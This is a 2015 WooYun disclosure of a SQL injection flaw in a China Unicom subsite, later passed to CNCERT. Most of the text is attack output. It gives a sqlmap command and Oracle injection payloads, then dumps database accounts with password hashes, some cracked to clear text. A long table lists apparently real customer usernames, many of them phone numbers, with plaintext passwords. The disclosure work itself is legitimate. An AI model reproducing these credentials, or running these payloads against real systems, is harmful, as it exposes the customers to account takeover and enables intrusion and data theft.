当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157296

漏洞标题:运营商安全之联通某业务分站注入

相关厂商:中国联通

漏洞作者: 李旭敏

提交时间:2015-12-01 13:38

修复时间:2016-01-18 13:50

公开时间:2016-01-18 13:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-04: 厂商已经确认,细节仅向厂商公开
2015-12-14: 细节向核心白帽子及相关领域专家公开
2015-12-24: 细节向普通白帽子公开
2016-01-03: 细节向实习白帽子公开
2016-01-18: 细节向公众公开

简要描述:

详细说明:

1.png


./sqlmap.py -u "http://**.**.**.**:80/tmap/map_unicom_list.asp?province=31&type=1&name=1&companytype=11&page=1" -p name


---
Parameter: name (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: province=31&type=1&name=1' AND 8515=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (8515=8515) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(122)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'WRhY' LIKE 'WRhY&companytype=11&page=1
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: province=31&type=1&name=1' AND 7020=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'UZfg' LIKE 'UZfg&companytype=11&page=1
---
[12:01:22] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] TSH_CMS

[*] _NEXT_USER [1]:
password hash: NULL
[*] ANONYMOUS [1]:
password hash: anonymous
[*] AQ_ADMINISTRATOR_ROLE [1]:
password hash: NULL
[*] AQ_USER_ROLE [1]:
password hash: NULL
[*] AUTHENTICATEDUSER [1]:
password hash: NULL
[*] CONNECT [1]:
password hash: NULL
[*] CTXAPP [1]:
password hash: NULL
[*] CTXSYS [1]:
password hash: 71E687F036AD56E5
[*] CWM_USER [1]:
password hash: NULL
[*] DBA [1]:
password hash: NULL
[*] DBSNMP [1]:
password hash: 8A7084606AE5EB5C
[*] DELETE_CATALOG_ROLE [1]:
password hash: NULL
[*] DIP [1]:
password hash: CE4A36B8E06CA59C
clear-text password: DIP
[*] DMSYS [1]:
password hash: BFBA5A553FD9E28A
[*] EJBCLIENT [1]:
password hash: NULL
[*] EXECUTE_CATALOG_ROLE [1]:
password hash: NULL
[*] EXFSYS [1]:
password hash: 66F4EF5650C20355
[*] EXP_FULL_DATABASE [1]:
password hash: NULL
[*] GATHER_SYSTEM_STATISTICS [1]:
password hash: NULL
[*] GLOBAL_AQ_USER_ROLE [1]:
password hash: GLOBAL
[*] HS_ADMIN_ROLE [1]:
password hash: NULL
[*] IMP_FULL_DATABASE [1]:
password hash: NULL
[*] JAVA_ADMIN [1]:
password hash: NULL
[*] JAVA_DEPLOY [1]:
password hash: NULL
[*] JAVADEBUGPRIV [1]:
password hash: NULL
[*] JAVAIDPRIV [1]:
password hash: NULL
[*] JAVASYSPRIV [1]:
password hash: NULL
[*] JAVAUSERPRIV [1]:
password hash: NULL
[*] LOGSTDBY_ADMINISTRATOR [1]:
password hash: NULL
[*] MDDATA [1]:
password hash: DF02A496267DEE66
clear-text password: MDDATA
[*] MDSYS [1]:
password hash: 72979A94BAD2AF80
[*] MGMT_USER [1]:
password hash: NULL
[*] MGMT_VIEW [1]:
password hash: 935F95FB02BB4765
[*] OEM_ADVISOR [1]:
password hash: NULL
[*] OEM_MONITOR [1]:
password hash: NULL
[*] OLAP_DBA [1]:
password hash: NULL
[*] OLAP_USER [1]:
password hash: NULL
[*] OLAPI_TRACE_USER [1]:
password hash: NULL
[*] OLAPSYS [1]:
password hash: 4AC23CC3B15E2208
[*] ORACLE_OCM [1]:
password hash: 5A2E026A9157958C
[*] ORDPLUGINS [1]:
password hash: 88A2B2C183431F00
[*] ORDSYS [1]:
password hash: 7EFA02EC7EA6B86F
clear-text password: ORDSYS
[*] OUTLN [1]:
password hash: 4A3BA55E08595C81
[*] PUBLIC [1]:
password hash: NULL
[*] RECOVERY_CATALOG_OWNER [1]:
password hash: NULL
[*] RESOURCE [1]:
password hash: NULL
[*] SCHEDULER_ADMIN [1]:
password hash: NULL
[*] SELECT_CATALOG_ROLE [1]:
password hash: NULL
[*] SI_INFORMTN_SCHEMA [1]:
password hash: 84B8CBCA4D477FA3
clear-text password: SI_INFORMTN_SCHEMA
[*] SJSC [1]:
password hash: F78A2CA3C9FC1704
clear-text password: SJSC
[*] SYS [1]:
password hash: 75800913E1B66343
[*] SYSMAN [1]:
password hash: 28F72A3C2D75FDE9
[*] SYSTEM [1]:
password hash: 970BAA5B81930A40
[*] TSH_CMS [1]:
password hash: AB00BC770037B5D7
[*] TSMSYS [1]:
password hash: 3DF26A8B17D0F29F
[*] UNISK_TEST [1]:
password hash: 273DB3E97685FF90
[*] UNITEST [1]:
password hash: A2E8021EA6E17874
clear-text password: UNITEST
[*] UNIWO [1]:
password hash: FF370F03D3985606
clear-text password: UNIWO
[*] WM_ADMIN_ROLE [1]:
password hash: NULL
[*] WMSYS [1]:
password hash: 7C9BA362F8314299
[*] XDB [1]:
password hash: 88D8364765FCE6AF
[*] XDBADMIN [1]:
password hash: NULL
[*] XDBWEBSERVICES [1]:
password hash: NULL


漏洞证明:

+------------------+--------------------------------------------+------+
| USERNAME | PASSWORD | MAIL |
+------------------+--------------------------------------------+------+
[14:39:17] [WARNING] console output will be trimmed to last 256 rows due to large table size
| 15611112502 | dididi | NULL |
| suhua | 751226 | NULL |
| Zlakiroran | 19861224 | NULL |
| yangyonghong | 20010804 | NULL |
| mengqk | 600212 | NULL |
| tz6lbj | 666666 | NULL |
| jiali906 | 850906 | NULL |
| bintang | dubint | NULL |
| 13104683304 | 123456 | NULL |
| suifengerqu | 541888 | NULL |
| 13011530114 | 13011530114 | NULL |
| 15612036025 | 15612036025 | NULL |
| 13003610508 | 13003610508 | NULL |
| 18642900631 | 7034030 | NULL |
| 1864111 | 870306 | NULL |
| shanhewose | a19890701 | NULL |
| 18641112809 | 123456 | NULL |
| lcliuliu | 123456 | NULL |
| mmibb | mm | NULL |
| santongfan | fantaoWUUNI | NULL |
| zhaozd | 123456 | NULL |
| lcyy | lhbhi20060318 | NULL |
| loveyou | lcylovesq1314 | NULL |
| ccc111cc | ccc111 | NULL |
| wangxx | 135790 | NULL |
| GLCHENG | mtwfhqpy | NULL |
| hongqi93 | 100789 | NULL |
| lanmao | 20890701 | NULL |
| zhoukaixuan | 111222 | NULL |
| mallpall | 421514 | NULL |
| liusg36 | 922384 | NULL |
| ZHANJUN | 101715 | NULL |
| 18641119588 | 18641119588 | NULL |
| ewsd1240 | yxb0305 | NULL |
| ffy123 | DLffy123 | NULL |
| hebiao | 840921 | NULL |
| 15637101282 | 123456 | NULL |
| ibincn | zhangbin930812 | NULL |
| lmj16578658 | 916718 | NULL |
| 15637006129 | 006129 | NULL |
| 15554163558 | 710310 | NULL |
| renny | 535106 | NULL |
| 15513075167 | 15513075167 | NULL |
| yingzi | cwz741109 | NULL |
| hnsmxxr | abc123 | NULL |
| 116117 | 116117 | NULL |
| stillme | wang10121986 | NULL |
| 992478972 | 516536 | NULL |
| liantng131 | 13134175685 | NULL |
| 18641115750 | 123456 | NULL |
| cpcuibm | 191028 | NULL |
| sovi | 147258 | NULL |
| Gaoxzcf | 13519025155 | NULL |
| 15609715655 | 111111 | NULL |
| yushijin | 123456 | NULL |
| fax6688 | 800120 | NULL |
| ghostli100 | 19890118 | NULL |
| leizi | 154813519 | NULL |
| gotoyes | 200300 | NULL |
| 1057 | 20102010 | NULL |
| dhl0118 | 782163 | NULL |
| gvei | gvei169 | NULL |
| baoxiuyun | 730211 | NULL |
| xjmacky | 760526 | NULL |
| 13193148804 | 111111 | NULL |
| ymeng | 123456 | NULL |
| 13014512670 | 839502 | NULL |
| aaaa | 761216 | NULL |
| 15516945883 | 15516945883 | NULL |
| 326034825 | 1108865595 | NULL |
| yangyong | 412726 | NULL |
| jixinhua | 198610 | NULL |
| 13259792689 | 000000 | NULL |
| 13277226161 | 111222 | NULL |
| 1598 | 131132 | NULL |
| wo186 | 131132 | NULL |
| shanshui | 988989 | NULL |
| chenlong1982 | 562743 | NULL |
| suixiaogang | 198726 | NULL |
| seamanlay | 5667561 | NULL |
| 9060 | 983986 | NULL |
| 1395 | 168600 | NULL |
| qingyuan | 925123 | NULL |
| tonydhj | dhj5211314 | NULL |
| yangguangjiyi | 410325325410 | NULL |
| chenlifeng | chen13076799410 | NULL |
| chinacows | woaini19850622 | NULL |
| 809298077 | cpj49928 | NULL |
| Lauken | 330410 | NULL |
| zhiqiu | 100100981031 | NULL |
| ABCD1107631825 | 031125 | NULL |
| lujiaolong | 04050905 | NULL |
| ahat | 720507 | NULL |
| xiangxiang | 909955 | NULL |
| cheng | chengyining2007 | NULL |
| yfsok | 62665822 | NULL |
| 446209495 | xing13266416556 | NULL |
| haode | 0306 | NULL |
| a46182898 | a19870205 | NULL |
| wxhwrygj | 14971590 | NULL |
| 8622 | 850178 | NULL |
| wuqian520 | shizhongruyiqian | NULL |
| Lijh | li56780 | NULL |
| 574006683 | 3021087 | NULL |
| trx00000 | 780720 | NULL |
| yjpyjp | 733209 | NULL |
| q703986096 | 101901 | NULL |
| weixl | 114263 | NULL |
| 13297666826 | 768203 | NULL |
| 13204385056 | 13204385056 | NULL |
| 798388561 | 13409201794 | NULL |
| 13280801626 | 1626 | NULL |
| sntewg | 870713 | NULL |
| 282413 | 101707 | NULL |
| gbz18 | 189376 | NULL |
| liuyanginchina | 371522 | NULL |
| 18656611719 | 737499 | NULL |
| lijiang1006 | ok13963099724 | NULL |
| 7919 | 131132 | NULL |
| ylqs001 | iedibrd5 | NULL |
| 7933 | 198312 | NULL |
| 868498 | 131132 | NULL |
| 0395 | 131132 | NULL |
| qwertyuiop | 147258 | NULL |
| wangtao | 853260 | NULL |
| yanghong | 123456789 | NULL |
| yanpen | 198403 | NULL |
| zhangkai | zhangkai | NULL |
| pelva | 820625 | NULL |
| 15636050408 | 691910 | NULL |
| shibo | 60236435231 | NULL |
| QINHUIXIN | 123456 | NULL |
| huangwei | 123456789 | NULL |
| 15585535380 | 680326680326 | NULL |
| long | ojl | NULL |
| mechelle | 11701170 | NULL |
| ym3188 | 112019 | NULL |
| 15948009185 | 123456 | NULL |
| jlbclwt | 58541240 | NULL |
| et1987 | et1987 | NULL |
| aqatg20110906 | 392691 | NULL |
| smxlhl | 2863079 | NULL |
| 13212003558 | 19840302 | NULL |
| mininaso | miyuxin | NULL |
| sy123321 | 135246 | NULL |
| 18641116753 | 18641116753 | NULL |
| dlxhrj | 495602 | NULL |
| zhaicj1 | 123321 | NULL |
| 18604921297 | 861120 | NULL |
| fenxiang | 19770428 | NULL |
| wangsuiyi | 412413 | NULL |
| gxl2011 | 654321 | NULL |
| huyiling | 915915 | NULL |
| zakuan | aa123456 | NULL |
| bhrc | 123456a | NULL |
| yf661 | 131132 | NULL |
| sjz881 | 131132 | NULL |
| zhanglishang | rshqch2009 | NULL |
| zgf869 | dlpass9869 | NULL |
| unisk001 | 20001123 | NULL |
| zhangliping | 198610 | NULL |
| xinyue | 198610 | NULL |
| sk9998 | 117988 | NULL |
| lxxycl | yang9257954 | NULL |
| haidao | 710224 | NULL |
| 13277226262 | 111222 | NULL |
| yangyang | 549175 | NULL |
| ltwz | 9365131 | NULL |
| xadf001 | 12837123 | NULL |
| 4921998 | lei20031022 | NULL |
| csic_lw | 15319907931 | NULL |
| wangxu | 1234 | NULL |
| qingxian | 653368 | NULL |
| jaycntw1 | 1990531 | NULL |
| 907396 | 201310 | NULL |
| bynd419 | 002315 | NULL |
| wsb76778945 | 951357 | NULL |
| 13256308679 | 222222 | NULL |
| hero191000 | 8272882728 | NULL |
| shaniuniu | 494662493 | NULL |
| hl8865067 | 830801 | NULL |
| 821829540 | 880815 | NULL |
| wu0019 | 830111 | NULL |
| 13098444446 | 111222 | NULL |
| ZHAOQIANG | 19910110 | NULL |
| 1589 | 131132 | NULL |
| fayen | 123456 | NULL |
| laoma | 6602618 | NULL |
| mingzhu | 662256 | NULL |
| 18602896237 | 252831 | NULL |
| 15607360638 | 822600 | NULL |
| 15607360639 | 000111 | NULL |
| teldzh | taoenli | NULL |
| chinaunicom | 123456 | NULL |
| shenxiaoqiao | 800526 | NULL |
| yangangyuan | 230201 | NULL |
| 68834634 | 010010001a | NULL |
| 454084893 | 511123 | NULL |
| hp815 | 188486 | NULL |
| love_880809 | 809809 | NULL |
| wsniuxiaoniu | 12908819niu | NULL |
| 547914367 | 917190 | NULL |
| sun0000 | 830618 | NULL |
| jinyanfighting | jinyan0710 | NULL |
| kalen | 13756045542 | NULL |
| 13253469087 | 555555 | NULL |
| zzybv | 756430 | NULL |
| dongxiahaohao | zhangdongxia | NULL |
| 15637809263 | 881213 | NULL |
| mxy3000 | 4172705 | NULL |
| 735667822 | 13071031803 | NULL |
| leiboby | 123465 | NULL |
| 15639609281 | 790417 | NULL |
| gongzheng | gongzheng | NULL |
| kfhglt | li8282033 | NULL |
| zhouhui888 | 811111 | NULL |
| fxgfan | 0210746 | NULL |
| hnsc888 | 761217 | NULL |
| weilai | abc | NULL |
| longbao1126 | 19921126 | NULL |
| yueastor | 274256601 | NULL |
| 453867817 | a64758053 | NULL |
| yangjunlei | yangjunlei | NULL |
| wanglibin | 721545 | NULL |
| wwweizhen | 15837975923 | NULL |
| leungloh | WiFi3GChina | NULL |
| 376386271 | 19890910 | NULL |
| dxtjy | 123456 | NULL |
| 3655 | 13014593655 | NULL |
| hbqinbo | hnqinbo | NULL |
| ycy1022 | 404470019 | NULL |
| 131371723231 | 052217 | NULL |
| yangand2008 | 197259 | NULL |
| zhuchangyong | 13290965985 | NULL |
| ilsunbo | sunbohao | NULL |
| yinkunji8888 | 2525131425 | NULL |
| a76740087 | 76740087 | NULL |
| 15637102026 | hy5668518 | NULL |
| 880815 | 821829540 | NULL |
| 15585302777 | 521512 | NULL |
| 666666 | 200300 | NULL |
| shenxiaomei | 657306 | NULL |
| wxyh | lhbhi20060318 | NULL |
| 13220226687 | gao7322845 | NULL |
| 13242440255 | 0807 | NULL |
| zhujing6 | 001368 | NULL |
| kouhz1 | 111111 | NULL |
| Houzj8 | hzj670624 | NULL |
| lczx | 000635 | NULL |
| Andy | 888999 | NULL |
| 2653 | 131132 | NULL |
| 18651278512 | 612523 | NULL |
| asdf | 376891217 | NULL |
| 83377948 | 19850612 | NULL |
| 13146300852 | 820222 | NULL |
| 13146601103 | 6601103 | NULL |
+------------------+--------------------------------------------+------+

修复方案:

版权声明:转载请注明来源 李旭敏@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-04 13:44

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国联通集团公司通报,由其后续协调网站管理部门处置。

最新状态:

暂无